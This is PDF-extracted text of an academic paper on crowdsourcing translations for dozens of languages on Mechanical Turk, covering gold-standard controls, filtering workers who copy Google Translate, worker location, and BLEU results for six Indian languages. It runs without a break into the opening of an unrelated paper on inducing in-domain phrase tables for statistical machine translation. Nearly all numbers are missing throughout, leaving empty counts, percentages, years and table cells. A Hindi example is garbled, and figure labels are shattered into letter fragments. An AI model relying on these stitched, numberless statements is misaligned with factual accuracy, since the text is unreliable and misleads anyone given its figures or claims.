vietnamese (vi), waray-waray (war), chinese (zh) k- k articles: afrikaans (af) amharic (am) asturian (ast) azerbaijani (az) belarusian (be) bengali (bn) bishnupriya manipuri (bpy) breton (br) bosnian (bs) cebuano (ceb) welsh (cy) zazaki (diq) greek (el) west frisian (fy) irish (ga) galician (gl) gujarati (gu) haitian (ht) armenian (hy) icelandic (is) javanese (jv) geor- gian (ka) kannada (kn) kurdish (ku) luxembourgish (lb) latvian (lv) malagasy (mg) macedonian (mk) malayalam (ml) marathi (mr) neapolitan (nap) low saxon (nds) nepali (ne) newar / nepal bhasa (new) norwegian (nynorsk) (nn) piedmontese (pms) sicil- ian (scn) serbo-croatian (sh) albanian (sq) sundanese (su) swahili (sw) tamil (ta) telugu (te) thai (th) tagalog (tl) urdu (ur) yoruba (yo) < k articles: central bicolano (bcl) tibetan (bo) ilokano (ilo) punjabi (pa) kapampangan (pam) pashto (ps) sindhi (sd) somali (so) uzbek (uz) wolof (wo) table : a list of the languages that were used in our study, grouped by the number of wikipedia articles in the language. each language’s code is given in parentheses. these language codes are used in other figures throughout this paper. wikipedia for every language to use as embedded controls. we used wikipedia’s inter-language links to pair titles of english articles with their corre- sponding foreign article’s title. to get a more trans- latable set of pairs, we excluded any pairs where: ( ) the english word was not present in the wordnet ontology (miller, ), ( ) either article title was longer than a single word, ( ) the english wikipedia page was a subcategory of person or place, or ( ) the english and the foreign titles were identical or a substring of the other. manual evaluation of non-identical translations we counted all translations that exactly matched the gold standard translation as correct. for non- exact matches we created a second-pass quality as- surance hit. turkers were shown a pair of en- glish words, one of which was a turker’s transla- tion of the foreign word used for quality control, and the other of which was the gold-standard trans- lation of the foreign word. evaluators were asked whether the two words had the same meaning, and chose between three answers: ‘yes’, ‘no’, or ‘re- figure : days to complete the translation hits for of the languages. tick marks represent the com- pletion of individual assignments. lated but not synonymous.’ examples of mean- ing equivalent pairs include: <petroglyphs, rock paintings>, <demo, show> and <loam, loam: soil rich in decaying matter>. non-meaning equiva- lents included: <assorted, minutes>, and <major, url of image>. related items were things like <sky, clouds>. misspellings like <lactation, lac- tiation > were judged to have same meaning, and were marked as misspelled. three separate turkers judged each pair, allowing majority votes for diffi- cult cases. we checked turkers who were working on this task by embedding pairs of words which were ei- पा क$ %तान ( भी + त$ कार %व.प २८ मई १९९८ छह परमाण परी:ण कर डा<। in retribution pakistan also did six nuclear tests on may . on may pakistan also conducted six nuclear tests as an act of redressal. retaliating on this ’pakistan’ conducted six( ) nuclear tests on may, . pakistan also did nuclear test in retribution on may, figure : an example of the turkers’ translations of a hindi sentence. the translations are unedited and contain fixable spelling, capitalization and grammat- ical errors. ther known to be synonyms (drawn from word- net) or unrelated (randomly chosen from a corpus). automating approval/rejections for the second-pass evaluation allowed the whole pipeline to be run au- tomatically. caching judgments meant that we ulti- mately needed only , synonym tasks to judge all of the submitted translations (a total of , non-matching word pairs). these were completed by an additional , workers. each of these as- signments included word pairs and paid $ . . full sentence translations to demonstrate the feasibility of using crowdsourcing to create multi- lingual technologies, we hire turkers to construct bilingual parallel corpora from scratch for six in- dian languages. germann ( ) attempted to build a tamil-english translation system from scratch by hiring professional translators, but found the cost prohibitive. we created parallel corpora by trans- lating the most viewed wikipedia pages in ben- gali, malyalam, hindi, tamil, telugu, and urdu into english. we collected four translations from differ- ent turkers for each source sentence. workers were paid $ . per hit to translate sentences. we accepted or rejected translations based on a manual review of each worker’s submis- sions, which included a comparison of the transla- tions to a monotonic gloss (produced with a dic- tionary), and metadata such as the amount of time the worker took to complete the hit and their geo- graphic location. figure shows an example of the translations we obtained. the lack of a professionally translated reference sentences prevented us from doing a sys- tematic comparison between the quality of profes- p t b s sh t l it sr ro e s m s d e a f te h r id d a n l tr g u sk fi h e m l fr ja p a b g m k n o g l h t g a sv c y lv h u k n a z b e lt k o n e e o a r p l m r c a c s sw t a h i b n n n k a so z h jv e l c e b v i b c l is su u z lb b p y sc n n e w u r sd b r p s ru a m w o b o . . . . . . figure : translation quality for languages with at least turkers. the dark blue bars indicate the pro- portion of translations which exactly matched gold standard translations, and light blue indicate translations which were judged to be correct synonyms. error bars show the % confidence intervals for each language. sion and non-professional translations as zaidan and callison-burch ( ) did. instead we evaluate the quality of the data by using it to train smt systems. we present results in section . measuring translation quality for single word translations, we calculate the qual- ity of translations on the level of individual assign- ments and aggregated over workers and languages. we define an assignment’s quality as the proportion of controls that are correct in a given assignment, where correct means exactly correct or judged to be synonymous. quality(ai) = ki ki∑ j= δ(trij ∈ syns[gj]) ( ) where ai is the ith assignment, ki is the number of controls in ai, trij is the turker’s provided transla- tion of control word j in assignment i, gj is the gold standard translation of control word j, syns[gj] is the set of words judged to be synonymous with gj and includes gj, and δ(x) is kronecker’s delta and takes value when x is true. most assignments had two known words embedded, so most assignments had scores of either , . , or . since computing overall quality for a language as the average assignment quality score is biased to- wards a small number of highly active turkers, we instead report language quality scores as the aver- age per-turker quality, where a turker’s quality is the average quality of all the assignments that she completed: quality(ti) = ∑ aj∈assigns[i] quality(aj) | assigns[i] | ( ) where assigns[i] is the assignments completed by turker i, and quality(a) is as above. quality for a language is then given by quality(li) = ∑ tj∈turkers[i] quality(tj) | turkers[i] | ( ) when a turker completed assignments in more than one language, their quality was computed separately for each language. figure shows the transla- tion quality for languages with contributions from at least workers. cheating using machine translation one obvi- ous way for workers to cheat is to use available online translation tools. although we followed best practices to deter copying-and-pasting into on- line mt systems by rendering words and sentences as images (zaidan and callison-burch, ), this strategy does not prevent workers from typing the words into an mt system if they are able to type in the language’s script. to identify and remove workers who appeared to be cheating by using google translate, we calcu- lated each worker’s overlap with the google transla- tions. we used google to translate all , words for the foreign languages that google trans- late covered at the time of the study. we mea- sured the percent of workers’ translations that ex- actly matched the translation returned from google. figure a shows overlap between turkers’s trans- lations and google translate. when overlap is high, it seems likely that those turkers are cheating. it is also reasonable to assume that honest workers will overlap with google some amount of the time as google’s translations are usually accurate. we di- vide the workers into three groups: those with very high overlap with google (likely cheating by using google to translate words), those with reasonable overlap, and those with no overlap (likely cheating by other means, for instance, by submitting random text). our gold-standard controls are designed to iden- tify workers that fall into the third group (those who are spamming or providing useless translations), but they will not effectively flag workers who are cheat- ing with google translate. we therefore remove the turkers with the highest overlap with google. this equates to removing all workers with greater than % overlap. figure b shows that removing workers at or above the % threshold retains % of the collected translations and over % of the workers. quality scores reported throughout the paper re- flect only translations from turkers whose overlap with google falls below this % threshold. data analysis we performed an analysis of our data to address the following questions: • do workers accurately represent their language abilities? should we constrain tasks by region? • how quickly can we expect work to be com- pleted in a particular language? (a) individual workers’ overlap with google translate. we removed the workers with the highest overlap (shaded region on the left) from our analyses, as it is rea- sonable to assume these workers are cheating by submit- ting translations from google. workers with no overlap (shaded region on the right) are also likely to be cheating, e.g. by submitting random text. (b) cumulative distribution of overlap with google trans- late for workers and translations. we see that eliminating all workers with > % overlap with google translate still preserves % of translations and > % of workers. figure • can turkers’ translations be used to train mt systems? • do our dictionaries improve mt quality? language skills and location we measured the average quality of workers who were in countries that plausibly speak a language, versus workers from countries that did not have large speaker populations of that language. we used the ethnologue (lewis avg. turker quality (# ts) primary locations primary locations in region out of region of turkers in region of turkers out of region hindi . ( ) . ( ) india ( ) uae ( ) uk ( ) saudi arabia ( ) russia ( ) oman ( ) tamil . ( ) ** . ( ) india ( ) us ( ) canada ( ) tunisia ( ) egypt ( ) malayalam . ( ) . ( ) india ( ) uae ( ) us ( ) saudi arabia ( ) maldives ( ) spanish . ( ) . ( ) us ( ) mexico ( ) spain ( ) india ( ) new zealand ( ) brazil ( ) french . ( ) . ( ) india ( ) us ( ) france ( ) greece ( ) netherlands ( ) japan ( ) chinese . ( ) . ( ) us ( ) singapore ( ) china ( ) hong kong ( ) australia ( ) germany ( ) german . ( ) . ( ) germany ( ) us ( ) austria ( ) india ( ) netherlands ( ) greece ( ) italian . ( ) * . ( ) italy ( ) us ( ) romania ( ) india ( ) ireland ( ) spain ( ) amharic . ( ) ** . ( ) us ( ) ethiopia ( ) india ( ) georgia ( ) macedonia ( ) kannada . ( ) na ( ) india ( ) arabic . ( ) ** . ( ) egypt ( ) jordan ( ) morocco ( ) us ( ) india ( ) canada ( ) sindhi . ( ) . ( ) india ( ) pakistan ( ) us ( ) macedonia ( ) georgia ( ) indonesia ( ) portuguese . ( ) . ( ) brazil ( ) portugal ( ) us ( ) romania ( ) japan ( ) israel ( ) turkish . ( ) . ( ) turkey ( ) us ( ) macedonia ( ) india ( ) pakistan ( ) taiwan ( ) telugu . ( ) . ( ) india ( ) us ( ) uae ( ) saudi arabia ( ) irish . ( ) . ( ) us ( ) ireland ( ) uk ( ) india ( ) romania ( ) macedonia ( ) swedish . ( ) . ( ) us ( ) sweden ( ) finland ( ) india ( ) macedonia ( ) croatia ( ) czech . ( ) * . ( ) us ( ) czech republic ( ) serbia ( ) macedonia ( ) india ( ) uk ( ) russian . ( ) * . ( ) us ( ) moldova ( ) russia ( ) india ( ) macedonia ( ) uk ( ) breton . ( ) . ( ) us ( ) india ( ) macedonia ( ) china ( ) table : translation quality when partitioning the translations into two groups, one containing translations submitted by turkers whose location is within regions that plausibly speak the foreign language, and the other containing translations from turkers outside those regions. in general, in-region turkers provide higher quality translations. (**) indicates differences significant at p= . , (*) at p= . . et al., ) to compile the list of countries where each language is spoken. table compares the av- erage translation quality of assignments completed within the region of each language, and compares it to the quality of assignments completed outside that region. our workers reported speaking languages na- tively. us workers alone reported native lan- guages. overall, , workers were located in a region likely to speak the language from which they were translating, and , workers were located in countries considered out of region (meaning that about a third of our , turkers completed hits in multiple languages). table shows the differences in translation qual- ity when computed using in-region versus out-of- region turkers, for the languages with the greatest number of workers. within region workers typi- cally produced higher quality translations. given the number of indian workers on mechanical turk, it is unsurprising that they represent majority of out- of-region workers. for the languages that had more than out of region workers (malay, amharic, ice- landic, sicilian, wolof, and breton), indian workers represented at least % of the out of region workers in each language. a few languages stand out for having suspiciously strong performance by out of region workers, no- tably irish and swedish, for which out of region workers account for a near equivalent volume and quality of translations to the in region workers. this is admittedly implausible, considering the relatively small number of irish speakers worldwide, and the very low number living in the countries in which our turkers were based (primarily india). such results highlight the fact that cheating using online transla- tion resources is a real problem, and despite our best efforts to remove workers using google translate, some cheating is still evident. restricting to within region workers is an effective way to reduce the prevalence of cheating. we discuss the languages which are best supported by true native speakers in section . speed of translation figure gives the comple- tion times for languages. the languages to finish in the shortest amount of time were: tamil, malayalam, telugu, hindi, macedonian, spanish, serbian, romanian, gujarati, and marathi. seven of the ten fastest languages are from india, which is un- , , , , , , , , m al ay al am ta m il tel ugu hindi urd u ben gal i figure : the total volume of translations (measured in english words) as a function of elapsed days. sentence english + dictionary language pairs foreign words entries bengali k k k hindi k , k k malayalam k k k tamil k k k telugu k , k k urdu k , k k table : size of parallel corpora and bilingual dic- tionaries collected for each language. surprising given the geographic distribution of work- ers. some languages follow the pattern of having a smattering of assignments completed early, with the rate picking up later. figure gives the throughput of the full-sentence translation task for the six indian languages. the fastest language was malayalam, for which we col- lected half a million words of translations in just un- der a week. table gives the size of the data set that we created for each of these languages. training smt systems we trained statistical translation models from the parallel corpora that we created for the six indian languages using the joshua machine translation system (post et al., ). table shows the translation performance when trained on the bitexts alone, and when incorporating the bilingual dictionaries created in our earlier hit. the scores reflect the performance when tested on held out sentences from the training data. adding the dic- trained on bitext + bleu language bitexts alone dictionaries ∆ bengali . . . hindi . . . malayalam . . . tamil . . . telugu . . . urdu . . . table : bleu scores for translating into english using bilingual parallel corpora by themselves, and with the addition of single-word dictionaries. scores are calculated using four reference translations and represent the mean of three mert runs. tionaries to the training set produces consistent per- formance gains, ranging from to bleu points. this represents a substantial improvement. it is worth noting, however, that while the source doc- uments for the full sentences used for testing were kept disjoint from those used for training, there is overlap between the source materials for the dictio- naries and those from the test set, since both the dic- tionaries and the bitext source sentences were drawn from wikipedia. discussion crowdsourcing platforms like mechanical turk give researchers instant access to a diverse set of bilin- gual workers. this opens up exciting new avenues for researchers to develop new multilingual systems. the demographics reported in this study are likely to shift over time. amazon may expand its payments to new currencies. posting long-running hits in other languages may recruit more speakers of those lan- guages. new crowdsourcing platforms may emerge. the data presented here provides a valuable snap- shot of the current state of mturk, and the methods used can be applied generally in future research. based on our study, we can confidently recom- mend languages as good candidates for research now: dutch, french, german, gujarati, italian, kan- nada, malayalam, portuguese, romanian, serbian, spanish, tagalog, and telugu. these languages have large turker populations who complete tasks quickly and accurately. table summarizes the strengths and weaknesses of all languages cov- ered in our study. several other languages are viable workers quality speed many high fast dutch, french, german, gu- jarati, italian, kannada, malay- alam, portuguese, romanian, serbian, spanish, tagalog, tel- ugu slow arabic, hebrew, irish, punjabi, swedish, turkish low fast hindi, marathi, tamil, urdu or medium slow bengali, bishnupriya ma- nipuri, cebuano, chinese, nepali, newar, polish, russian, sindhi, tibetan few high fast bosnia, croatian, macedonian, malay, serbo-croatian slow afrikaans, albanian, aragonese, asturian, basque, belarusian, bulgarian, central bicolano, czech, danish, finnish, galacian, greek, haitian, hungarian, icelandic, ilokano, indonesian, japanese, javanese, kapampangan, kazakh, korean, lithuanian, low saxon, malagasy, nor- wegian (bokmal), sicilian, slovak, slovenian, thai, ukra- nian, uzbek, waray-waray, west frisian, yoruba low fast – or medium slow amharic, armenian, azer- baijani, breton, catalan, georgian, latvian, luxembour- gish, neapolitian, norwegian (nynorsk), pashto, pied- montese, somali, sudanese, swahili, tatar, vietnamese, walloon, welsh none low or medium slow esperanto, ido, kurdish, per- sian, quechua, wolof, zazaki table : the green box shows the best languages to target on mturk. these languages have many work- ers who generate high quality results quickly. we defined many workers as or more active in-region workers, high quality as ≥ % accuracy on the gold standard controls, and fast if all of the , words were completed within two weeks. candidates provided adequate quality control mech- anisms are used to select good workers. since mechanical turk provides financial incen- tives for participation, many workers attempt to complete tasks even if they do not have the lan- guage skills necessary to do so. since mturk does not provide any information about workers demo- graphics, including their language competencies, it can be hard to exclude such workers. as a result naive data collection on mturk may result in noisy data. a variety of techniques should be incorporated into crowdsourcing pipelines to ensure high quality data. as a best practice, we suggest: ( ) restricting workers to countries that plausibly speak the foreign language of interest, ( ) embedding gold standard controls or administering language pretests, rather than relying solely on self-reported language skills, and ( ) excluding workers whose translations have high overlap with online machine translation sys- tems like google translate. if cheating using exter- nal resources is likely, then also consider ( ) record- ing information like time spent on a hit (cumulative and on individual items), patterns in keystroke logs, tab/window focus, etc. although our study targeted bilingual workers on mechanical turk, and neglected monolingual work- ers, we believe our results reliably represent the cur- rent speaker populations, since the vast majority of the work available on the crowdsourced platform is currently english-only. we therefore assume the number of non-english speakers is small. in the fu- ture, it may be desirable to recruit monolingual for- eign workers. in such cases, we recommend other tests to validate their language abilities in place of our translation test. these could include perform- ing narrative cloze, or listening to audio files con- taining speech in different language and identifying their language. data release with the publication of this paper, we are releasing all data and code used in this study. our data release includes the raw data, along with bilingual dictionar- ies that are filtered to be high quality. it will include , translation assignments from , turkers and , synonym assignments from , turk- ers, along with meta information like geolocation and time submitted, plus external dictionaries used for validation. the dictionaries will contain . m total translated words in languages, along with code to filter the dictionaries based on different cri- teria. the data also includes parallel corpora for six indian languages, ranging in size between , to . million words. acknowledgements this material is based on research sponsored by a darpa computer science study panel phase award entitled “crowdsourcing translation” (con- tract d pc ). the views and conclusions contained in this publication are those of the authors and should not be interpreted as representing offi- cial policies or endorsements by darpa or the u.s. government. this research was supported by the johns hopkins university human language tech- nology center of excellence and through gifts from microsoft and google. the authors would like to thank the anonymous reviewers for their thoughtful comments, which sub- stantially improved this paper. references amazon. . service summary tour for re- questers on amazon mechanical turk. https:// requester.mturk.com/tour. vamshi ambati and stephan vogel. . can crowds build parallel corpora for machine translation systems? in proceedings of the naacl hlt workshop on creating speech and language data with amazon’s mechanical turk. association for computational lin- guistics. vamshi ambati, stephan vogel, and jaime carbonell. . active learning and crowd-sourcing for ma- chine translation. in proceedings of the th interna- tional conference on language resources and evalu- ation (lrec). vamshi ambati. . active learning and crowd- sourcing for machine translation in low resource scenarios. ph.d. thesis, language technologies in- stitute, school of computer science, carnegie mellon university, pittsburgh, pa. michael s. bernstein, greg little, robert c. miller, bjrn hartmann, mark s. ackerman, david r. karger, david crowell, and katrina panovich. . soylent: a word processor with a crowd inside. in proceed- ings of the acm symposium on user interface soft- ware and technology (uist). jeffrey p. bigham, chandrika jayant, hanjie ji, greg lit- tle, andrew miller, robert c. miller, robin miller, aubrey tatarowicz, brandyn white, samual white, and tom yeh. . vizwiz: nearly real-time an- swers to visual questions. in proceedings of the acm symposium on user interface software and technol- ogy (uist). michael bloodgood and chris callison-burch. . large-scale cost-focused active learning for statisti- cal machine translation. in proceedings of the th annual meeting of the association for computational linguistics. chris callison-burch and mark dredze. . creating speech and language data with amazon’s mechanical turk. in proceedings of the naacl hlt work- shop on creating speech and language data with amazon’s mechanical turk, pages – , los angeles, june. association for computational linguistics. jia deng, alexander berg, kai li, and li fei-fei. . what does classifying more than , image cate- gories tell us? in proceedings of the th european conference of computer vision (eccv, pages – . maxine eskenazi, gina-anne levow, helen meng, gabriel parent, and david suendermann. . crowdsourcing for speech processing, applications to data collection, transcription and assessment. wi- ley. siamak faridani, björn hartmann, and panagiotis g. ipeirotis. . what’s the right price? pricing tasks for finishing on time. in third aaai human compu- tation workshop (hcomp’ ). ulrich germann. . building a statistical machine translation system from scratch: how much bang for the buck can we expect? in acl workshop on data-driven machine translation, toulouse, france. chang hu, benjamin b. bederson, and philip resnik. . translation by iterative collaboration between monolingual users. in proceedings of acm sigkdd workshop on human computation (hcomp). chang hu, philip resnik, yakov kronrod, vladimir ei- delman, olivia buzek, and benjamin b. bederson. . the value of monolingual crowdsourcing in a real-world translation scenario: simulation using haitian creole emergency sms messages. in pro- ceedings of the sixth workshop on statistical ma- chine translation, pages – , edinburgh, scot- land, july. association for computational linguistics. panagiotis g. ipeirotis. a. analyzing the mechani- cal turk marketplace. in acm xrds, december. panagiotis g. ipeirotis. b. demographics of mechanical turk. technical report working paper ceder- - , new york university, stern school of business. ann irvine and alexandre klementiev. . using me- chanical turk to annotate lexicons for less commonly used languages. in workshop on creating speech and language data with mturk. ian lane, matthias eck, kay rottmann, and alex waibel. . tools for collecting speech corpora via mechanical-turk. in proceedings of the naacl hlt workshop on creating speech and lan- guage data with amazon’s mechanical turk, los an- geles. florian laws, christian scheible, and hinrich schütze. . active learning with amazon mechanical turk. in proceedings of the conference on empirical methods in natural language processing, edinburgh, scotland. matthew lease, jessica hullman, jeffrey p. bigham, juho kim michael s. bernstein and, walter lasecki, saeideh bakhshi, tanushree mitra, and robert c. miller. . mechanical turk is not anony- mous. http://dx.doi.org/ . /ssrn. . vili lehdonvirta and mirko ernkvist. . knowl- edge map of the virtual economy: converting the virtual economy into development potential. http://www.infodev.org/en/document. .pdf, april. an infodev publication. m. paul lewis, gary f. simons, and charles d. fennig (eds.). . ethnologue: languages of the world, seventeenth edition. http://www.ethnologue. com. greg little, lydia b. chilton, rob miller, and max gold- man. . turkit: tools for iterative tasks on me- chanical turk. in proceedings of the workshop on human computation at the international conference on knowledge discovery and data mining (kdd- hcomp ’ ), paris. matthew marge, satanjeev banerjee, and alexander rudnicky. . using the amazon mechanical turk to transcribe and annotate meeting speech for extrac- tive summarization. in workshop on creating speech and language data with mturk. george a. miller. . wordnet: a lexical database for english. communications of the acm, ( ): – . robert munro and hal tily. . the start of the art: introduction to the workshop on crowdsourcing technologies for language and cognition studies. in crowdsourcing technologies for language and cog- nition studies, boulder. scott novotney and chris callison-burch. . cheap, fast and good enough: automatic speech recognition with non-expert transcription. in human language technologies: the annual conference of the north american chapter of the association for com- putational linguistics, pages – . association for computational linguistics. gabriel parent and maxine eskenazi. . speaking to the crowd: looking at past achievements in using crowdsourcing for speech and predicting future chal- lenges. in proceedings interspeech , special ses- sion on crowdsourcing. matt post, chris callison-burch, and miles osborne. . constructing parallel corpora for six indian languages via crowdsourcing. in proceedings of the seventh workshop on statistical machine translation, pages – , montréal, canada, june. association for computational linguistics. alexander j. quinn and benjamin b. bederson. . human computation: a survey and taxonomy of a growing field. in computer human interaction (chi). cyrus rashtchian, peter young, micah hodosh, and ju- lia hockenmaier. . collecting image annotations using amazon’s mechanical turk. in workshop on creating speech and language data with mturk. joel ross, lilly irani, m. six silberman, andrew zal- divar, and bill tomlinson. . who are the crowd- workers?: shifting demographics in amazon mechan- ical turk. in alt.chi session of chi extended abstracts on human factors in computing systems, at- lanta, georgia. yaron singer and manas mittal. . pricing mecha- nisms for online labor markets. in third aaai human computation workshop (hcomp’ ). rion snow, brendan o’connor, daniel jurafsky, and andrew y. ng. . cheap and fast - but is it good? evaluating non-expert annotations for natural language tasks. in proceedings of emnlp. alexander sorokin and david forsyth. . utility data annotation with amazon mechanical turk. in first ieee workshop on internet vision at cvpr. luis von ahn. . human computation. ph.d. thesis, school of computer science, carnegie mellon uni- versity, pittsburgh, pa. omar f. zaidan and chris callison-burch. . crowd- sourcing translation: professional quality from non- professionals. in proceedings of the th annual meeting of the association for computational lin- guistics: human language technologies, pages – . association for computational linguistics. rabih zbib, erika malchiodi, jacob devlin, david stallard, spyros matsoukas, richard schwartz, john makhoul, omar f. zaidan, and chris callison-burch. . machine translation of arabic dialects. in the conference of the north american chapter of the association for computational linguistics. asso- ciation for computational linguistics. rabih zbib, gretchen markiewicz, spyros matsoukas, richard schwartz, and john makhoul. . sys- tematic comparison of professional and crowdsourced reference translations for machine translation. in pro- ceedings of the conference of the north amer- ican chapter of the association for computational linguistics: human language technologies, atlanta, georgia. phrase table induction using in-domain monolingual data for domain adaptation in statistical machine translation benjamin marie atsushi fujita national institute of information and communications technology - hikaridai, seika-cho, soraku-gun, kyoto, - , japan {bmarie, atsushi.fujita}@nict.go.jp abstract we present a new framework to induce an in- domain phrase table from in-domain monolin- gual data that can be used to adapt a general- domain statistical machine translation system to the targeted domain. our method first compiles sets of phrases in source and target languages separately and generates candidate phrase pairs by taking the cartesian product of the two phrase sets. it then computes in- expensive features for each candidate phrase pair and filters them using a supervised clas- sifier in order to induce an in-domain phrase table. we experimented on the language pair english–french, both translation directions, in two domains and obtained consistently better results than a strong baseline system that uses an in-domain bilingual lexicon. we also con- ducted an error analysis that showed the in- duced phrase tables proposed useful transla- tions, especially for words and phrases unseen in the parallel data used to train the general- domain baseline system. introduction in phrase-based statistical machine translation (smt), translation models are estimated over a large amount of parallel data. in general, using more data leads to a better translation model. when no specific domain is targeted, general-domain par- allel data from various domains may be used to as in axelrod et al. ( ), in this paper, we use the term general-domain instead of the commonly used out-of-domain because we assume that the parallel data may contain some in- domain sentence pairs. train a general-purpose smt system. however, it is well-known that, in training a system to trans- late texts from a specific domain, using in-domain parallel data can lead to a significantly better trans- lation quality (carpuat et al., ). indeed, when only general-domain parallel data are used, it is un- likely that the translation model can learn expres- sions and their translations specific to the targeted domain. such expressions will then remain untrans- lated in the in-domain texts to translate. so far, in-domain parallel data have been har- nessed to cover domain-specific expressions and their translations in the translation model. however, even if we can assume the availability of a large quantity of general-domain parallel data, at least for resource-rich language pairs, finding in-domain par- allel data specific to a particular domain remains challenging. in-domain parallel data may not exist for the targeted language pairs or may not be avail- able at hand to train a good translation model. in order to circumvent the lack of in-domain par- allel data, this paper presents a new method to adapt an existing smt system to a specific domain by in- ducing an in-domain phrase table, i.e., a set of phrase pairs associated with features for decoding, from in- domain monolingual data. as we review in sec- tion , most of the existing methods for inducing phrase tables are not designed, and may not perform as expected, to induce a phrase table for a specific domain for which only limited resources are avail- able. instead of relying on large quantity of parallel data or highly comparable corpora, our method in- duces an in-domain phrase table from unaligned in- domain monolingual data through a three-step pro- transactions of the association for computational linguistics, vol. , pp. – , . action editor: chris quirk. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. cedure: phrase collection, phrase pair scoring, and phrase pair filtering. incorporating our induced in- domain phrase table into an smt system achieves substantial improvements in translating in-domain texts over a strong baseline system, which uses an in-domain bilingual lexicon. to achieve this improvement, our proposed method for inducing an in-domain phrase table ad- dresses several limitations of previous work by: • dealing with source and target phrases of arbi- trary length collected from in-domain monolin- gual data, • proposing translations for not only unseen source phrases, but also those already seen in the general-domain parallel data, and • making use of potentially many features com- puted from the monolingual data, as well as from the parallel data, in order to score and fil- ter the candidate phrase pairs. in the remainder of this paper, we first review previous work in section , highlighting the main weaknesses of existing methods for inducing a phrase table for domain adaptation, and our moti- vation. in section , we then present our phrase ta- ble induction method with all the necessary steps: phrase collection (section . ), computing features of each phrase pair (section . ), and pruning the induced phrase tables to keep their size manageable (section . ). in section , we describe our exper- iments to evaluate the impact of the induced phrase tables in translating in-domain texts. following the description of the data (section . ), we explain the tools and parameters used to induce the phrase tables (section . ), our smt systems (section . ), and present additional baseline systems (section . ). our experimental results are given in section . . section . analyzes the error distribution of the translations produced by an smt system using our induced phrase table, followed by translation exam- ples to further illustrate its impact in section . . fi- nally, section concludes this work and proposes some possible improvements to our approach. motivation in machine translation (mt), words and phrases that do not appear in the training parallel data, i.e., out- of-vocabulary (oov) tokens, have been recognized as one of the fundamental issues, regardless of the scenario, such as adapting existing smt systems to a new specific domain. one straightforward way to find translations of oov words and phrases consists in enlarging the parallel data used to train the translation model. this can be done by retrieving parallel sentences from comparable corpora. however, these methods heav- ily rely on document-level information (zhao and vogel, ; utiyama and isahara, ; fung and cheung, ; munteanu and marcu, ) to re- duce their search space by scoring only sentence pairs extracted from each pair of documents. in- deed, scoring all possible sentence pairs from two large monolingual corpora using costly features and a classifier, as proposed by munteanu and marcu ( ) for instance, is computationally too expen- sive. in many cases, we may not have access to document-level information in the given monolin- gual data for the targeted domain. furthermore, even without considering computational cost, it is unlikely that a large number of parallel sentences can be retrieved from non-comparable monolingual corpora. hewavitharana and vogel ( ) proposed to directly extract phrase pairs from comparable sen- tences. however, the number of retrievable phrase pairs is strongly limited, because one can collect such comparable sentences only on a relatively small scale for the targeted language pairs and domains. when in-domain parallel or comparable sentences can not be easily retrieved, another possibility to find translations for oov words is bilingual word lexi- con induction using comparable or unaligned mono- lingual corpora (fung, ; rapp, ; koehn and knight, ; haghighi et al., ; daumé and jagarlamudi, ; irvine and callison-burch, ). this approach is especially useful in finding words and their translations specific to the given cor- pus. a recent and completely different trend of work uses an unsupervised method regarding translation as a decipherment problem to learn a bilingual word lexicon and use it as a translation model (ravi and knight, ; dou and knight, ; nuhn et al., ). however, all these methods deal only with for instance, using these approaches on source and target monolingual data containing both millions sentences means that we have to evaluate × candidate sentence pairs. words, mainly owing to the computational complex- ity of dealing with arbitrary lengths of phrases. translations of phrases can be induced using bilingual word lexicons and considering permuta- tions of word ordering (zhang and zong, ; irvine and callison-burch, ). however, it is costly to thoroughly investigate all combinations of a large number of word-level translation candi- dates and possible permutations of word ordering. to retain only appropriate phrase pairs, irvine and callison-burch ( ) proposed to exploit a set of features. some of them, including temporal, contex- tual, and topic similarity features, strongly relied on the comparability of wikipedia articles and on the availability of news articles annotated with a times- tamp (klementiev et al., ). we may not have such useful resources in large quantity for the tar- geted language pairs and domains. saluja et al. ( ) and zhao et al. ( ) also proposed methods to induce a phrase table, focus- ing only on the oov words and phrases: unigrams and bigrams in the source side of their development and test data that are unseen in the training data. in their approach, no new translation options are proposed for known source phrases. to generate candidate phrase pairs, for a given source phrase, saluja et al. ( ) uses only phrases from the tar- get side of their parallel data and their morphologi- cal variants ranked and pruned according to the for- ward lexical translation probabilities given by their baseline system’s translation model. their approach thus strongly relies on the accuracy of the exist- ing translation model. for instance, if the given source phrase contains only oov tokens, as it may happen when translating a text from a different do- main, their approach cannot retrieve candidate tar- get phrases. furthermore, they do not make use of external monolingual data to explore unseen target phrases. their method is consequently inadequate to produce translations for phrases from a different domain than the one of the parallel data. while saluja et al. ( ) used a costly graph propagation strategy to score the candidate phrase pairs, zhao et al. ( ) used a method with a much lower computational cost and reported higher bleu scores using only word embeddings to score and rank many phrase pairs generated from tar- get phrases, unigrams and bigrams, collected from monolingual corpora. the main contribution of zhao et al. ( ) is the use of a local linear projec- tion strategy (llp) to obtain a cross-lingual seman- tic similarity score for each phrase pair. it makes the projection of source embeddings to the target em- beddings space by learning a translation matrix for each source phrase embedding, trained on m gold phrase pairs with source phrase embeddings simi- lar to the one to project. after the projection, based only on the similarity over embeddings, the k near- est target phrases of the projected source phrase are retrieved. if the projection for a given source phrase is not accurate enough, very noisy phrase pairs are generated. this may be a problem especially when the given source phrase does not need to be trans- lated (i.e., numbers, dates, molecule names, etc.). the system will translate it, because this source phrase previously oov is now registered in its in- duced phrase table, but has only wrong translations available (see section . for empirical evidences). in-domain phrase table induction to induce an in-domain phrase table, our approach assumes the availability of large general-domain parallel data and in-domain monolingual data of both source and target languages. for some of our configurations, we also assume the availability of an in-domain bilingual lexicon to compute features as- sociated with each candidate phrase pair and to com- pute a reliability score to filter appropriate ones. . in-domain phrase collection in a standard configuration, smt systems extract phrases of a length up to six or seven tokens. col- lecting all the n-grams of such a length from a given large monolingual corpus is feasible, but will pro- vide a large set of source and target phrases, re- sulting in an enormous number of candidate phrase pairs. in the next step, we evaluate each candidate in a given set of phrase pairs; it is thus crucial to get a reasonably small set of phrases. in contrast with previous work, we collect more meaningful phrases than arbitrary short n-grams, us- ing the following formula presented by mikolov et al. ( a): score(wiwj) = freq(wiwj)−δ freq(wi)× freq(wj) where wi and wj are two consecutive tokens, freq(·) the frequency of a given word or phrase in the given monolingual corpus, and δ a discounting coefficient that prevents the retrieval of many phrases composed from infrequent words. each bigram wiwj in the monolingual corpus is scored with this formula and only the bigrams with a score above a predefined threshold θ are regarded as phrases. all the iden- tified phrases are transformed into one token, and a new pass is performed over the monolingual corpus to obtain new phrases also using the phrases identi- fied in the previous passes. to further limit the num- ber of collected phrases, we consider only phrases containing words that appear at least k times in the monolingual data. after t passes, we compile a set of phrases with (a) all the single words and (b) all 